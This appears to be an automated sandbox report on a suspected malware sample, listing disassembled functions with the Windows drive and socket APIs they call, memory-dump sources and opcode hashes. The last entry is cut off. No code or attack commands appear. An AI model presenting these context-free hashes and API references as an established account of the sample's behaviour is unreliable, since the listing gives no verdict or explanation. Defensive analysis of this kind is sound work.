                                                              Function 07140257 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 2c94018f280128871516da7cad3f037503c9bf19c75183f0dac1e76aa6ce17f8
                                                              • Instruction ID: baddda38c82133ca54f3b623f5b8e2546046341af1519e62b9aa6d4759d2f53e
                                                              • Opcode Fuzzy Hash: 2c94018f280128871516da7cad3f037503c9bf19c75183f0dac1e76aa6ce17f8
                                                              • Instruction Fuzzy Hash: B431E4EB56D120BE620A81972754AF66E7EE7CF630B3284B6F903C55C2E3980F4D5031
                                                              Function 071402A9 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: a7158117fe9936c48b91f3276db7e5043f61bbe951a96b47edf824d3828e069e
                                                              • Instruction ID: 6b63a03ad4051c569751d517d0f55df0e0aa311e72bbaba18e40ec7fd262f3ad
                                                              • Opcode Fuzzy Hash: a7158117fe9936c48b91f3276db7e5043f61bbe951a96b47edf824d3828e069e
                                                              • Instruction Fuzzy Hash: FC3106EB56D121BEB20A91572B54AF66E7DE7CB230B3284BAF503C65C2E3940F4D5031
                                                              Function 07140284 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: c33cf89cb6e539676be7501e5d2ce72aa40373386492e7949ba181180111fb1a
                                                              • Instruction ID: 8da42123fb0059b495d5f0566187923061cd76922697d4c7f910da49bf674ae1
                                                              • Opcode Fuzzy Hash: c33cf89cb6e539676be7501e5d2ce72aa40373386492e7949ba181180111fb1a
                                                              • Instruction Fuzzy Hash: 8631C7EB16D120BE724A85972754AF66E7EE7CB630B3284B6F903D55C2E3880F4D5131
                                                              Function 07140296 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: acf905c10dd31d725f8de4d0c4d2317b7373a2a07867a6396fd4f33961c854f9
                                                              • Instruction ID: 101b9aed99619f1baa2750f584755c102061d5cdd5f23a5603fa35906b3f542f
                                                              • Opcode Fuzzy Hash: acf905c10dd31d725f8de4d0c4d2317b7373a2a07867a6396fd4f33961c854f9
                                                              • Instruction Fuzzy Hash: 8731D4EB16C120BEB24A81972B54AF66E7DE6CB630B3284B6F907C5582E3C40F4E5131
                                                              Function 071402D7 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 25f3c87b8da2a9ed70f0b4e5007d9c48ba4db8d5db995af7fedd78c97cb8142f
                                                              • Instruction ID: 4861d900016dacd40349766826468a1b8a9773a7d54b1722945432fedcbbe1b6
                                                              • Opcode Fuzzy Hash: 25f3c87b8da2a9ed70f0b4e5007d9c48ba4db8d5db995af7fedd78c97cb8142f
                                                              • Instruction Fuzzy Hash: 7421E7EB16D120BE720A91972B546F66E7DE6CB630B3284BBF507C6982E3D80F4D5131
                                                              Function 07140350 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5322c603608d393ae0d3b386c0560015386d85b4401bb93cc06cfcc76b58f1d2
                                                              • Instruction ID: 34a91fe3362a0b2426bdf822472fff92bebeaa9f571777119f7f8e8fc944e8ae
                                                              • Opcode Fuzzy Hash: 5322c603608d393ae0d3b386c0560015386d85b4401bb93cc06cfcc76b58f1d2
                                                              • Instruction Fuzzy Hash: 4021E6EB56C220BEB20A919727547F66F69E7CB230B3284B7F503C6582E3980F4E5131
                                                              Function 07140304 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: f3f58f0eb9d7eb5f0235b98c7f351a0382b26fa0dc9914d02cb60f694d27238d
                                                              • Instruction ID: 0e98b5bae2470ce2f119680f31e74ed3a547260abd8e159a76f5869a5aafc066
                                                              • Opcode Fuzzy Hash: f3f58f0eb9d7eb5f0235b98c7f351a0382b26fa0dc9914d02cb60f694d27238d
                                                              • Instruction Fuzzy Hash: A02106FB16C110BE720A91672B546F66F7DEACB630B3284B6F507C6582E3980E4A5131
                                                              Function 071402F6 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 9f1ecf72adad81a01d6ae7537ee08c78bca96c77d048f0aebda30da44566e7c2
                                                              • Instruction ID: 03de8bdc40cd18c33ba0887e95e5fe8558bdad4c2a2498f48f6c5a1baf94a8dd
                                                              • Opcode Fuzzy Hash: 9f1ecf72adad81a01d6ae7537ee08c78bca96c77d048f0aebda30da44566e7c2
                                                              • Instruction Fuzzy Hash: 6921C4FB26C210BEB20A959727546F66E79E6CB630B3284B6F503C6582E7980F4D5131
                                                              Function 0057AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0057AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 5d15a6eec5541786b1c98b115fb0df91bc54de2556a6562e01027f4d78a5a54f
                                                              • Instruction ID: e28617b2bb4b8a3d0db48759e95cc4dbed2dbfe617836d18e85e6a61d5e2df2a
                                                              • Opcode Fuzzy Hash: 5d15a6eec5541786b1c98b115fb0df91bc54de2556a6562e01027f4d78a5a54f
                                                              • Instruction Fuzzy Hash: D211967080878595EB268F18D4067F6B7F4FFD0329F10DA19E59942150F7325AC59BC2
                                                              Function 0057A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0057A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                              • Instruction ID: 69fd17fc71ebc6e969a57137627ad345dfb2c137835a895f895dad3775b734ed
                                                              • Opcode Fuzzy Hash: fa0010bcfd05a9c754b0dac6ca1af61b870b05848dc3da4bcf2818b26984d682
                                                              • Instruction Fuzzy Hash: 1F01A272B01710AFC6148F24EC85B5ABBA5FFC4720F068659FA982B361C331AC109BD1
                                                              Function 0057AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,0057B280,00000000,-00000001,00000000,0057B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0057AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 2270176297072e68a198bf00d2f94e2f1ba7075e74fcb3813ae85978eaea539b
                                                              • Instruction ID: c3039194a06c162b416ac3de6e55b52b9b05256532755c62970f411903c924f0
                                                              • Opcode Fuzzy Hash: 2270176297072e68a198bf00d2f94e2f1ba7075e74fcb3813ae85978eaea539b
                                                              • Instruction Fuzzy Hash: D3E0EDB6A192216BD654DE18F8449ABF769EFC4B20F059A49F85467204C730AC508BE2
                                                              Function 07120947 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 136a8c49e1bb4e9455845620978ce4775dfc8b1a2a13e7064b0fd0c314f061bb
                                                              • Instruction ID: b0debc9de15b8d29621302a154c8b00a2f10f41182298e632dcc8c9a79ab3898
                                                              • Opcode Fuzzy Hash: 136a8c49e1bb4e9455845620978ce4775dfc8b1a2a13e7064b0fd0c314f061bb
                                                              • Instruction Fuzzy Hash: FD5190EB12C130BDB556C1416B14EFA676EE6DB730B328667F807D1582E3940B6B6131
                                                              Function 0057B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • closesocket.WS2_32(?,00579422,?,?,?,?,?,?,?,?,?,?,?,w3V,008F7680,00000000), ref: 0057B04C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                              • Instruction ID: 5a52fb5baf6ca32121b915a6d8fde2f4916c9ead73226c6721e428eaf86788e6
                                                              • Opcode Fuzzy Hash: 8b78c3216fad740247c530386c6bc97df97b7f3063722cc6ab3fe52690b48687
                                                              • Instruction Fuzzy Hash: C1D0C23070020057DA209A64D888B477B6B7FC1710F29CB68F42C4B154C73BCC439602
                                                              Function 005167E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,004EAF56,?,00000001), ref: 005167FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 1d71b031e2068896dd0e9078d43ea7200cef32908f391db28787c2f0728746d5
                                                              • Instruction ID: 138fa63837c4d5d8309e9c11fbf541c660f582e4033b569c2718004ce565f68b
                                                              • Opcode Fuzzy Hash: 1d71b031e2068896dd0e9078d43ea7200cef32908f391db28787c2f0728746d5
                                                              • Instruction Fuzzy Hash: BDC080F511C101BFC70C8724D855B2F7BD8DB45355F01581CB046C11C0EA309994CF1B
                                                              Function 0712093D Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 1f4f0b2f7c2274f012f6b6536fcde12531561de54db7fdc3077a498ac065e402
                                                              • Instruction ID: dcc8ae4b5bfe27e4e8edfc214b745870533cb8fa069b83b5d11d90bc98abacbf
                                                              • Opcode Fuzzy Hash: 1f4f0b2f7c2274f012f6b6536fcde12531561de54db7fdc3077a498ac065e402
                                                              • Instruction Fuzzy Hash: F2416EEF12C130BDB55AC1416B54AFA666EE1DB730B328627F807D1682E3990B6B6131
                                                              Function 0712096B Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 715addf88455af9fe7a541ca6b65a1bdd7343ba7b8e715be6ea665efe9e7095a
                                                              • Instruction ID: d87c4f43190494ba4768a798975cf8dbc2bf8ca16a2784d80c898292f20c5d74
                                                              • Opcode Fuzzy Hash: 715addf88455af9fe7a541ca6b65a1bdd7343ba7b8e715be6ea665efe9e7095a
                                                              • Instruction Fuzzy Hash: 3C41B2EF12C130BDB54AC1416B14EFA676EE5DB730B328667F807D1682E3940B6B6131
                                                              Function 0712098E Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: f7d9b0b288be8a0c6c04fd7acf7dfa86fb0beeefb5e81af7964469447bf63fb6
                                                              • Instruction ID: 76b8867dfcf57ba5eb5a48c8dcf9e6e9453a19c88926ae581e7877ecfb312bf9
                                                              • Opcode Fuzzy Hash: f7d9b0b288be8a0c6c04fd7acf7dfa86fb0beeefb5e81af7964469447bf63fb6
                                                              • Instruction Fuzzy Hash: 2541B3FB12C130BDB556C5816B14AFA676EE6DB730B328627F807D1582E3980F6B6131
                                                              Function 071209A4 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494597056.0000000007120000.00000040.00001000.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7120000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P9
                                                              • API String ID: 0-2283168155
                                                              • Opcode ID: 99c9520be2942870491ab067ff80de1ccca28d06db8b3415807e9fcc5add7841
                                                              • Instruction ID: a3c00c13aa19e5153c301a61df8b05ab56ed3ac4dc65d395ccab1f55c869e909
                                                              • Opcode Fuzzy Hash: 99c9520be2942870491ab067ff80de1ccca28d06db8b3415807e9fcc5add7841
                                                              • Instruction Fuzzy Hash: EE4180EF12C130BDB156C5416B14AFA666EE6DB730B328627F807D1682E3940F6A6131
                                                              Function 004B31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 01a4b09e886bae2d05fb2df64926543b5008984c19753b3ba8b44d7ea0e11fd3
                                                              • Instruction ID: 08b87e50c107c94a0a388f5069531fefd697124ced5fed2a635516c4c20e2e54
                                                              • Opcode Fuzzy Hash: 01a4b09e886bae2d05fb2df64926543b5008984c19753b3ba8b44d7ea0e11fd3
